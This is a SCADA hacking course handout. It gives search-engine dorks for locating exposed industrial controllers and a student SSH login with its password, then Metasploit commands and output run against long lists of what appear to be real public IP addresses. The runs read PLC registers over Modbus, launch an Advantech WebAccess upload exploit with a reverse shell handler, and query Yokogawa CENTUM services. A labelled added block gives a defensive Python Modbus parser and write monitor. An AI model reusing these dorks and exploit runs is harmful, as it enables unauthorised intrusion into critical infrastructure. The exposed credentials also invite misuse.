joemccray

SCADA Security

May 6th, 2020
  1. ################
  2. ############################## # Google Dorks # ##############################
  3. ################
  4.  
  5. "login" intitle:"scada login"
  6.  
  7.  
  8.  
  9.  
  10.  
  11. ####################
  12. # Siemens Products #
  13. ####################
  14. inurl:/Portal0000.htm
  15. inurl:"Portal/Portal.mwsl"
  16. intitle:"Miniweb Start Page" | inurl:"/CSS/Miniweb.css"
  17.  
  18.  
  19. #####################################
  20. # Allen-Bradley Rockwell Automation #
  21. #####################################
  22. intitle:"Rockwell Automation" "Device Name" "Uptime"
  23. inurl:dtm.html intitle:1747-L552
  24. inurl:dtm.html intitle:1747-L551
  25. inurl:home.htm intitle:1766
  26.  
  27.  
  28.  
  29. ################
  30. ############################## # Shodan Dorks # ##############################
  31. ################
  32.  
  33. ######################
  34. # Schneider Electric #
  35. ######################
  36. PowerLogic PM800
  37. 8650 ION
  38.  
  39. Reference:
  40. https://www.slideshare.net/qqlan/icsscadaplc-googleshodanhq-cheat-sheet
  41.  
  42.  
  43.  
  44.  
  45. ###################################
  46. ############################## # Attacking SCADA with Metasploit # ##############################
  47. ###################################
  48.  
  49. ###################
  50. # Student account #
  51. ###################
  52. Here is a good tutorial that you should complete before doing the labs below:
  53. http://linuxsurvival.com/linux-tutorial-introduction/
  54.  
  55.  
  56. - I prefer to use PuTTY to SSH into my Linux host.
  57. - You can download PuTTY from here:
  58. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  59.  
  60. Here is the information to put into PuTTY:
  61. ip: 149.28.239.26:4
  62. protocol: ssh
  63. port: 22
  64. user: secureninja-scada
  65. password: Hacking-ICS-123!!
  66.  
  67.  
  68. To run Metasploit:
  69. ---------------------------Type This-----------------------------------
  70. sudo msfconsole
  71. ----------------------------------------------------------------------
  72.  
  73.  
  74.  
  75. --------------------------------------------------------------------------------------------------------------------------------------------
  76.  
  77.  
  78.  
  79. Interpretation:
  80. When you run modules, you may see output like this:
  81. connection was refused by the remote host: this generally means we were blocked by a firewall.
  82. The connection timed out: the service runs on a different port, or it is not running at all.
  83.  
  84.  
  85.  
  86. Some modules attack only Windows-based hosts, so it is better to filter the IPs by the running OS.
  87. Check the operating system type using nmap:
  88.  
  89.  
  90. sudo nmap --script smb-os-discovery.nse -p445 <List of ip separated by space>
  91.  
  92.  
  93.  
  94.  
  95. --------------------------------------------------------------------------------------------------------------------------------------------
  96.  
  97.  
  98.  
  99. Using Metasploit we can search for Modbus Modules
  100. -------------------------------------------------
  101. Module: auxiliary/scanner/scada/modbusdetect Modbus Version Scanner
  102.  
  103.  
  104.  
  105.  
  106. ---------------------------Type This-----------------------------------
  107. use auxiliary/scanner/scada/modbusdetect
  108. set RHOSTS 127.0.0.1
  109. run
  110. ----------------------------------------------------------------------
  111.  
  112.  
  113.  
  114.  
  115. Output:
  116. [+] 127.0.0.1:502 - 127.0.0.1:502 - MODBUS - received correct MODBUS/TCP header (unit-ID: 1)
  117. [*] 127.0.0.1:502 - Scanned 1 of 1 hosts (100% complete)
  118. [*] Auxiliary module execution completed
  119.  
  120.  
  121.  
  122. --------------------------------------------------------------------------------------------------------------------------------------------
  123.  
  124.  
  125.  
  126. Find Unit IDs
  127. -------------------------
  128. Module: auxiliary/scanner/scada/modbus_findunitid
  129.  
  130. ---------------------------Type This-----------------------------------
  131. use auxiliary/scanner/scada/modbus_findunitid
  132. set RHOSTS 127.0.0.1
  133. run
  134. ----------------------------------------------------------------------
  135.  
  136.  
  137.  
  138.  
  139.  
  140.  
  141. Output:
  142. [*] Running module against 127.0.0.1
  143.  
  144. [+] 127.0.0.1:502 - Received: correct MODBUS/TCP from stationID 1
  145. [+] 127.0.0.1:502 - Received: correct MODBUS/TCP from stationID 2
  146. [+] 127.0.0.1:502 - Received: correct MODBUS/TCP from stationID 3
  147. [+] 127.0.0.1:502 - Received: correct MODBUS/TCP from stationID 4
  148. [+] 127.0.0.1:502 - Received: correct MODBUS/TCP from stationID 5
  149. ...
  150. ^C[-] 127.0.0.1:502 - Stopping running against current target...
  151. [*] 127.0.0.1:502 - Control-C again to force quit all targets.
  152. [*] Auxiliary module execution completed
  153.  
  154.  
  155.  
  156. --------------------------------------------------------------------------------------------------------------------------------------------
  157.  
  158.  
  159.  
  160. Read and write data to a PLC using the Modbus protocol.
  161. -------------------------
  162. Module: auxiliary/scanner/scada/modbusclient Modbus Client Utility
  163.  
  164. ---------------------------Type This-----------------------------------
  165. use auxiliary/scanner/scada/modbusclient
  166. set DATA_ADDRESS 1
  167. set RHOSTS 85.105.152.58, 217.243.233.147, 37.84.40.39, 46.35.12.123, 91.189.101.99, 46.44.28.5, 81.168.114.148, 166.247.102.45, 120.157.47.29, 81.236.12.221
  168. run
  169. ----------------------------------------------------------------------
  170.  
  171.  
  172.  
  173.  
  174.  
  175.  
  176. Output:
  177. [*] Running module against 85.105.152.58
  178. [*] 85.105.152.58:502 - Sending READ HOLDING REGISTERS...
  179. [-] 85.105.152.58:502 - Unknown answer
  180. [*] Running module against 217.243.233.147
  181. [*] 217.243.233.147:502 - Sending READ HOLDING REGISTERS...
  182. [-] 217.243.233.147:502 - Error : ILLEGAL DATA ADDRESS
  183. [*] Running module against 37.84.40.39
  184. [*] 37.84.40.39:502 - Sending READ HOLDING REGISTERS...
  185. [+] 37.84.40.39:502 - 100 register values from address 1 :
  186. [+] 37.84.40.39:502 - [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
  187. [*] Running module against 46.35.12.123
  188. [*] 46.35.12.123:502 - Sending READ HOLDING REGISTERS...
  189. [-] 46.35.12.123:502 - Error : ILLEGAL DATA ADDRESS
  190. [*] Running module against 91.189.101.99
  191. [*] 91.189.101.99:502 - Sending READ HOLDING REGISTERS...
  192. [-] 91.189.101.99:502 - Error : ILLEGAL DATA ADDRESS
  193. [*] Running module against 46.44.28.5
  194. [*] 46.44.28.5:502 - Sending READ HOLDING REGISTERS...
  195. [+] 46.44.28.5:502 - 100 register values from address 1 :
  196. [+] 46.44.28.5:502 - [8224, 8224, 8224, 8224, 8224, 8224, 8224, 8224, 8224, 8224, 8224, 21041, 11825, 11829, 8224, 8224, 12846, 13368, 11843, 20533, 12340, 11845, 16723, 21504, 2, 0, 100, 229, 440, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2343, 2380, 2204, 500, 0, 0, 0, 0, 0, 0, 2, 2200, 500, 24, 0, 0, 0, 0, 0, 0, 2200, 1100, 2400, 500, 0, 0, 0, 0, 0, 0, 120, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
  197. [*] Running module against 81.168.114.148
  198. [*] 81.168.114.148:502 - Sending READ HOLDING REGISTERS...
  199. [-] 81.168.114.148:502 - Unknown error
  200. [*] Running module against 166.247.102.45
  201. [*] 166.247.102.45:502 - Sending READ HOLDING REGISTERS...
  202. [+] 166.247.102.45:502 - 100 register values from address 1 :
  203. [+] 166.247.102.45:502 - [42143, 16283, 1, 16000, 14756, 16271, 1, 16000, 30895, 16001, 30895, 16001, 53116, 16226, 53116, 16226, 31775, 16161, 51086, 16158, 44077, 16221, 44077, 16221, 0, 0, 0, 0, 0, 0, 22523, 16719, 0, 0, 0, 0, 0, 0, 0, 0, 17819, 18345, 0, 0, 0, 0, 0, 0, 40285, 16719, 0, 0, 0, 0, 0, 0, 0, 0, 30677, 18683, 0, 0, 0, 0, 0, 0, 0, 0, 15564, 17460, 27516, 16778, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20482, 48281, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
  204. [*] Running module against 120.157.47.29
  205. [*] 120.157.47.29:502 - Sending READ HOLDING REGISTERS...
  206. [+] 120.157.47.29:502 - 100 register values from address 1 :
  207. [+] 120.157.47.29:502 - [1, 1, 1, 1, 0, 0, 0, 1, 533, 533, 421, 597, 721, 578, 0, 0, 0, 570, 21, 21, 21, 21, 21, 21, 0, 0, 0, 21, 11, 11, 10, 11, 10, 11, 0, 0, 0, 11, 1952, 1952, 1806, 1943, 1816, 1842, 0, 0, 0, 1872, 9, 32767, 0, 32767, 32767, 57, 32767, 0, 32767, 332, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0]
  208. [*] Running module against 81.236.12.221
  209. [*] 81.236.12.221:502 - Sending READ HOLDING REGISTERS...
  210. [+] 81.236.12.221:502 - 100 register values from address 1 :
  211. [+] 81.236.12.221:502 - [186, 219, 200, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767]
  212. [*] Auxiliary module execution completed
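
Added example, not part of the original paste or of Metasploit: a Python parser for the Modbus/TCP frames behind the output above (the MBAP header check, a READ HOLDING REGISTERS reply, the ILLEGAL DATA ADDRESS exception), plus a monitoring check that flags write requests from hosts outside an allowlist. The sample frames, the documentation-range source addresses and all function names are constructed for illustration.

```python
import struct

READS = {1: "READ COILS", 2: "READ DISCRETE INPUTS",
         3: "READ HOLDING REGISTERS", 4: "READ INPUT REGISTERS"}
WRITES = {5: "WRITE SINGLE COIL", 6: "WRITE SINGLE REGISTER",
          15: "WRITE MULTIPLE COILS", 16: "WRITE MULTIPLE REGISTERS"}
EXCEPTIONS = {1: "ILLEGAL FUNCTION", 2: "ILLEGAL DATA ADDRESS",
              3: "ILLEGAL DATA VALUE", 4: "SERVER DEVICE FAILURE"}


def split_adu(frame):
    """Validate the 7-byte MBAP header; return (unit_id, function, data)."""
    if len(frame) < 8:
        raise ValueError("too short for MBAP header plus function code")
    _tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("protocol identifier must be 0 for Modbus/TCP")
    if length != len(frame) - 6:  # length field counts unit id + PDU
        raise ValueError("MBAP length does not match frame size")
    return unit, frame[7], frame[8:]


def parse_response(frame):
    """Decode a server reply: exception, register read, or other."""
    unit, fc, data = split_adu(frame)
    if fc & 0x80:  # high bit set marks an exception response
        if not data:
            raise ValueError("exception response without a code")
        return {"unit": unit, "function": fc & 0x7F,
                "error": EXCEPTIONS.get(data[0], "code %d" % data[0])}
    if fc in (3, 4):  # byte count followed by big-endian 16-bit registers
        if not data or data[0] != len(data) - 1 or data[0] % 2:
            raise ValueError("bad register byte count")
        regs = list(struct.unpack(">%dH" % (data[0] // 2), data[1:]))
        return {"unit": unit, "function": fc, "registers": regs}
    return {"unit": unit, "function": fc, "raw": data}


def parse_request(frame):
    """Decode a client request: function name, kind and start address."""
    unit, fc, data = split_adu(frame)
    kind = "write" if fc in WRITES else "read" if fc in READS else "other"
    name = WRITES.get(fc) or READS.get(fc) or "function %d" % fc
    addr = None
    if kind != "other":  # these functions all begin with a 16-bit address
        if len(data) < 2:
            raise ValueError("request truncated before the address")
        addr = struct.unpack(">H", data[:2])[0]
    return {"unit": unit, "function": name, "kind": kind, "address": addr}


def unexpected_writes(captured, allowed_writers):
    """Return (source, function, address) for writes from unlisted hosts."""
    alerts = []
    for src, frame in captured:
        try:
            req = parse_request(frame)
        except ValueError:
            continue  # not well-formed Modbus/TCP, ignore here
        if req["kind"] == "write" and src not in allowed_writers:
            alerts.append((src, req["function"], req["address"]))
    return alerts


# Constructed sample frames: MBAP header, unit id, function code, data.
READ_REQ = bytes.fromhex("000100000006" "01" "03" "0001" "0064")
ILLEGAL_ADDR = bytes.fromhex("000100000003" "01" "83" "02")
READ_OK = bytes.fromhex("000200000007" "01" "03" "04" "000a" "0014")
WRITE_REQ = bytes.fromhex("000300000006" "01" "06" "0001" "00ff")
# Constructed capture: (source address, payload seen on TCP/502).
CAPTURE = [("192.0.2.10", READ_REQ), ("192.0.2.10", WRITE_REQ),
           ("198.51.100.7", WRITE_REQ), ("198.51.100.7", b"GET / HTTP/1.1")]

if __name__ == "__main__":
    print(parse_response(ILLEGAL_ADDR))
    print(parse_response(READ_OK))
    print(unexpected_writes(CAPTURE, {"192.0.2.10"}))
```
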
  213.  
  214.  
  215.  
  216. --------------------------------------------------------------------------------------------------------------------------------------------
  217.  
  218.  
  219.  
  220. Advantech WebAccess Dashboard Viewer uploadImageCommon
  221. -------------------------
  222. Module: exploit/windows/scada/advantech_webaccess_dashboard_file_upload
  223.  
  224. ---------------------------Type This-----------------------------------
  225. use exploit/windows/scada/advantech_webaccess_dashboard_file_upload
  226. set LHOST <PENTESTER_MACHINE_IP>
  227. set RHOSTS 180.106.49.61, 111.67.22.113, 18.216.97.13, 92.111.176.156, 167.172.236.47, 125.133.120.89, 74.207.241.183, 76.31.116.9, 34.193.252.20, 34.195.232.54, 111.67.22.114, 159.203.70.183, 190.61.51.235, 34.197.79.104, 40.87.45.154, 66.175.222.58, 5.196.95.208, 163.30.46.20, 18.221.95.245, 111.67.22.112, 176.93.42.26, 125.133.120.91, 52.221.99.106, 111.67.22.114, 173.201.2.17, 115.197.188.245, 97.64.205.26, 18.138.82.76, 159.65.254.19, 66.11.42.85, 13.234.163.37, 180.107.81.51, 111.67.22.112, 3.208.81.176, 212.61.153.5, 73.230.217.70, 128.53.84.248, 163.30.46.28, 220.130.7.227, 18.207.253.39
  228. run
  229. ----------------------------------------------------------------------
  230.  
  231.  
  232.  
  233.  
  234.  
  235.  
  236. Output:
  237. [*] Exploiting target 180.106.49.61
  238. [*] Started reverse TCP handler on 149.28.239.26:4444
  239. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  240. [*] Exploiting target 111.67.22.113
  241. [*] Started reverse TCP handler on 149.28.239.26:4444
  242. [*] 111.67.22.113:80 - Target is not vulnerable.
  243. [*] Exploiting target 18.216.97.13
  244. [*] Started reverse TCP handler on 149.28.239.26:4444
  245. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  246. [*] Exploiting target 92.111.176.156
  247. [*] Started reverse TCP handler on 149.28.239.26:4444
  248. [*] 92.111.176.156:80 - Target is not vulnerable.
  249. [*] Exploiting target 167.172.236.47
  250. [*] Started reverse TCP handler on 149.28.239.26:4444
  251. [*] 167.172.236.47:80 - Target is not vulnerable.
  252. [*] Exploiting target 125.133.120.89
  253. [*] Started reverse TCP handler on 149.28.239.26:4444
  254. [*] 125.133.120.89:80 - Target is not vulnerable.
  255. [*] Exploiting target 74.207.241.183
  256. [*] Started reverse TCP handler on 149.28.239.26:4444
  257. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  258. [*] Exploiting target 76.31.116.9
  259. [*] Started reverse TCP handler on 149.28.239.26:4444
  260. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  261. [*] Exploiting target 34.193.252.20
  262. [*] Started reverse TCP handler on 149.28.239.26:4444
  263. [*] 34.193.252.20:80 - Target is not vulnerable.
  264. [*] Exploiting target 34.195.232.54
  265. [*] Started reverse TCP handler on 149.28.239.26:4444
  266. [*] 34.195.232.54:80 - Target is not vulnerable.
  267. [*] Exploiting target 111.67.22.114
  268. [*] Started reverse TCP handler on 149.28.239.26:4444
  269. [*] 111.67.22.114:80 - Target is not vulnerable.
  270. [*] Exploiting target 159.203.70.183
  271. [*] Started reverse TCP handler on 149.28.239.26:4444
  272. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  273. [*] Exploiting target 190.61.51.235
  274. [*] Started reverse TCP handler on 149.28.239.26:4444
  275. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  276. [*] Exploiting target 34.197.79.104
  277. [*] Started reverse TCP handler on 149.28.239.26:4444
  278. [*] 34.197.79.104:80 - Target is not vulnerable.
  279. [*] Exploiting target 40.87.45.154
  280. [*] Started reverse TCP handler on 149.28.239.26:4444
  281. [*] 40.87.45.154:80 - Target is not vulnerable.
  282. [*] Exploiting target 66.175.222.58
  283. [*] Started reverse TCP handler on 149.28.239.26:4444
  284. [*] 66.175.222.58:80 - Target is not vulnerable.
  285. [*] Exploiting target 5.196.95.208
  286. [*] Started reverse TCP handler on 149.28.239.26:4444
  287. [*] 5.196.95.208:80 - Target is not vulnerable.
  288. [*] Exploiting target 163.30.46.20
  289. [*] Started reverse TCP handler on 149.28.239.26:4444
  290. [*] 163.30.46.20:80 - Target is not vulnerable.
  291. [*] Exploiting target 18.221.95.245
  292. [*] Started reverse TCP handler on 149.28.239.26:4444
  293. [*] 18.221.95.245:80 - Target is not vulnerable.
  294. [*] Exploiting target 111.67.22.112
  295. [*] Started reverse TCP handler on 149.28.239.26:4444
  296. [*] 111.67.22.112:80 - Target is not vulnerable.
  297. [*] Exploiting target 176.93.42.26
  298. [*] Started reverse TCP handler on 149.28.239.26:4444
  299. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  300. [*] Exploiting target 125.133.120.91
  301. [*] Started reverse TCP handler on 149.28.239.26:4444
  302. [*] 125.133.120.91:80 - Target is not vulnerable.
  303. [*] Exploiting target 52.221.99.106
  304. [*] Started reverse TCP handler on 149.28.239.26:4444
  305. [*] 52.221.99.106:80 - Target is not vulnerable.
  306. [*] Exploiting target 111.67.22.114
  307. [*] Started reverse TCP handler on 149.28.239.26:4444
  308. [*] 111.67.22.114:80 - Target is not vulnerable.
  309. [*] Exploiting target 173.201.2.17
  310. [*] Started reverse TCP handler on 149.28.239.26:4444
  311. [*] 173.201.2.17:80 - Target is not vulnerable.
  312. [*] Exploiting target 115.197.188.245
  313. [*] Started reverse TCP handler on 149.28.239.26:4444
  314. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  315. [*] Exploiting target 97.64.205.26
  316. [*] Started reverse TCP handler on 149.28.239.26:4444
  317. [*] 97.64.205.26:80 - Target is not vulnerable.
  318. [*] Exploiting target 18.138.82.76
  319. [*] Started reverse TCP handler on 149.28.239.26:4444
  320. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  321. [*] Exploiting target 159.65.254.19
  322. [*] Started reverse TCP handler on 149.28.239.26:4444
  323. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  324. [*] Exploiting target 66.11.42.85
  325. [*] Started reverse TCP handler on 149.28.239.26:4444
  326. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  327. [*] Exploiting target 13.234.163.37
  328. [*] Started reverse TCP handler on 149.28.239.26:4444
  329. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  330. [*] Exploiting target 180.107.81.51
  331. [*] Started reverse TCP handler on 149.28.239.26:4444
  332. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  333. [*] Exploiting target 111.67.22.112
  334. [*] Started reverse TCP handler on 149.28.239.26:4444
  335. [*] 111.67.22.112:80 - Target is not vulnerable.
  336. [*] Exploiting target 3.208.81.176
  337. [*] Started reverse TCP handler on 149.28.239.26:4444
  338. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  339. [*] Exploiting target 212.61.153.5
  340. [*] Started reverse TCP handler on 149.28.239.26:4444
  341. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  342. [*] Exploiting target 73.230.217.70
  343. [*] Started reverse TCP handler on 149.28.239.26:4444
  344. [*] 73.230.217.70:80 - Target is not vulnerable.
  345. [*] Exploiting target 128.53.84.248
  346. [*] Started reverse TCP handler on 149.28.239.26:4444
  347. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  348. [*] Exploiting target 163.30.46.28
  349. [*] Started reverse TCP handler on 149.28.239.26:4444
  350. [*] 163.30.46.28:80 - Target is not vulnerable.
  351. [*] Exploiting target 220.130.7.227
  352. [*] Started reverse TCP handler on 149.28.239.26:4444
  353. [-] Exploit failed: NoMethodError undefined method `get_json_document' for nil:NilClass
  354. [*] Exploiting target 18.207.253.39
  355. [*] Started reverse TCP handler on 149.28.239.26:4444
  356. [*] 18.207.253.39:80 - Target is not vulnerable.
  357. [*] Exploit completed, but no session was created.
  358.  
  359.  
  360.  
  361. --------------------------------------------------------------------------------------------------------------------------------------------
  362.  
  363.  
  364.  
  365. Discover host information through the Digi International ADDP service
  366. ---------------------------------------------------------------------
  367. Module: auxiliary/scanner/scada/digi_addp_version
  368.  
  369. ---------------------------Type This-----------------------------------
  370. use auxiliary/scanner/scada/digi_addp_version
  371. set RHOSTS 159.138.247.118, 47.89.191.67, 117.78.0.83, 101.200.201.208, 159.138.241.185, 77.241.235.60, 47.108.135.77, 47.252.80.226, 47.90.76.10, 121.36.141.175, 159.138.241.185, 121.37.18.173, 121.37.20.93, 47.103.136.32, 185.135.81.161, 178.115.225.102, 121.37.23.213, 85.10.93.237, 119.3.173.22, 159.138.247.118, 121.36.137.187, 47.252.80.226, 116.62.39.231, 8.209.81.240, 47.103.124.74, 121.36.141.175, 119.3.157.114, 92.104.172.94, 121.37.23.213, 101.200.201.208, 47.89.191.67, 117.78.0.83, 159.138.147.130, 159.138.241.185, 47.108.135.77, 77.241.235.60, 47.90.76.10, 147.139.161.210
  372. run
  373. ----------------------------------------------------------------------
  374.  
  375.  
  376.  
  377.  
  378.  
  379.  
  380. Output:
  381. [*] Finding ADDP nodes within 159.138.247.118->147.139.161.210 (38 hosts)
  382. [*] Scanned 38 of 38 hosts (100% complete)
  383. [*] Auxiliary module execution completed
  384.  
  385.  
  386.  
  387. --------------------------------------------------------------------------------------------------------------------------------------------
  388.  
  389.  
  390.  
  391. Allow an unauthenticated user to interact with the Yokogawa CENTUM CS3000 service
  392. ---------------------------------------------------------------------------------
  393. Module: auxiliary/admin/scada/yokogawa_bkbcopyd_client
  394.  
  395. ---------------------------Type This-----------------------------------
  396. use auxiliary/admin/scada/yokogawa_bkbcopyd_client
  397. set action RETR
  398. set RHOSTS 182.23.4.50, 216.130.151.217, 114.57.190.20, 216.130.151.213, 182.253.27.117, 210.160.226.240, 216.130.151.25, 217.14.95.81, 183.91.86.107, 52.58.141.191, 216.130.129.52, 82.106.139.36, 216.130.151.225, 208.38.227.20, 183.101.49.60, 210.160.226.241, 116.12.151.216, 113.166.92.225, 12.200.223.55, 183.91.86.111, 182.30.224.104, 122.28.50.238, 60.248.154.24, 209.52.71.58, 203.125.202.69, 210.161.43.96, 103.82.146.13, 216.130.151.193, 216.13.183.207, 116.211.5.214, 182.30.224.86, 114.57.190.20, 182.30.224.237, 182.30.224.228, 182.30.224.228, 122.28.50.238, 216.130.151.17, 216.130.151.207, 60.43.234.117, 117.239.41.6, 217.117.3.162, 182.30.224.128, 182.30.224.253, 210.212.165.150, 182.30.224.98, 60.43.234.117
  399. run
  400. ----------------------------------------------------------------------
  401.  
  402.  
  403.  
  404.  
  405.  
  406. Output:
  407. [*] 182.23.4.50:20111 - 27101
  408. [*] 182.23.4.50:20111 - Sending RETR packet...
  409. [-] 182.23.4.50:20111 - Auxiliary failed: Rex::ConnectionRefused The connection was refused by the remote host (182.23.4.50:20111).
  410. [-] 182.23.4.50:20111 - Call stack:
  411. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket/comm/local.rb:298:in `rescue in create_by_type'
  412. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket/comm/local.rb:263:in `create_by_type'
  413. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket/comm/local.rb:33:in `create'
  414. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket.rb:49:in `create_param'
  415. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket/tcp.rb:37:in `create_param'
  416. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/rex-socket-0.1.23/lib/rex/socket/tcp.rb:28:in `create'
  417. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/tcp.rb:106:in `connect'
  418. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/framework/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb:86:in `send_pkt'
  419. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/framework/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb:70:in `exploit'
  420. [-] 182.23.4.50:20111 - /opt/metasploit-framework/embedded/framework/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb:47:in `run'
  421.  
  422. ....
  423. [*] Running module against 210.212.165.150
  424. [*] 210.212.165.150:20111 - 52431
  425. [*] 210.212.165.150:20111 - Sending RETR packet...
  426. [-] 210.212.165.150:20111 - Auxiliary failed: Rex::ConnectionTimeout The connection timed out (210.212.165.150:20111).
  427.  
  428.  
  429.  
  430. --------------------------------------------------------------------------------------------------------------------------------------------
  431.  
  432.  
  433.  
  434. References:
  435. https://www.peerlyst.com/posts/how-to-attack-and-defend-scada-systems-chiheb-chebbi
  436. https://www.hackers-arise.com/post/2016/11/25/scada-hacking-metasloit-scada-modules
  437. https://www.hackers-arise.com/post/2018/10/22/metasploit-basics-part-16-metasploit-scada-hacking
  438.  
  439.  
  440.  
  441.  
  442. ##############
  443. ############################## # SCADA CTFs # ##############################
  444. ##############
  445.  
  446.  
  447.  
  448.  
  449.  
  450.  
  451.  
  452.  
  453. References:
  454. https://advancedpersistentjest.com/2016/07/31/writeup-tmctf-iot100/
  455. https://github.com/digitalbond/CTF-Challenges
  456.  
  457. ####################
  458. ############################## # SCADA Simulators # ##############################
  459. ####################
  460.  
  461.  
  462.  
  463. References:
  464. https://github.com/sintax1/scadasim
  465. https://github.com/hi-KK/ICS-Common-Protocol-Simulator
  466. https://github.com/mjfarmer/scada_py
  467.  
  468.  
  469.  
  470.  
  471. ###################
  472. ############################## # SCADA Honeypots # ##############################
  473. ###################
  474.  
  475.  
  476.  
  477.  
  478.  
  479.  
  480.  
  481.  
  482.  
  483.  
  484. References:
  485. https://github.com/mushorg/conpot
  486. https://dtag-dev-sec.github.io/mediator/feature/2016/03/11/t-pot-16.03.html